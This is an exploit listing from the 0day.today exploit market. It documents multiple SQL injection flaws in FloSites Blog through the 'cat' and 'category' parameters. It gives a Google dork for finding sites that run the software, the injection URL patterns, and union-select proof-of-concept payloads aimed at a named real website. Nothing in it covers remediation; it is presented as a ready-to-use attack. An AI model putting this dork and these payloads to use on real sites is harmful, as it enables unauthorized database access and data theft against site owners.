[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

FloSites Blog Multiple Remote SQL Injection Vulnerabilities

Author
Vrs-hCk
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4186
Category
web applications
Date add
16-11-2008
Platform
unsorted
===========================================================
FloSites Blog Multiple Remote SQL Injection Vulnerabilities
===========================================================


===========================================================================================
[-] Title    : Multiple SQL Injection Vulnerability
[-] Software : Flosites Blog
[-] Vendor   : www.flosites.com
[-] Date     : 17 November 2008 (Indonesia)
[-] Author   : Vrs-hCk
===========================================================================================

[+] Google Dork

    "blog by flosites"

[+] Exploit

    http://[site]/[path]/index.php?cat=-1 [SQL]/*
    http://[site]/[path]/index.php?category=-1 [SQL]/*

[+] Proof of Concept

    http://www.designaglow.com/blog/index.php?cat=-1+union+select+1,version(),3/*
    http://www.designaglow.com/blog/index.php?category=-1+union+select+1,version(),3/*

===========================================================================================



#  0day.today [2024-12-25]  #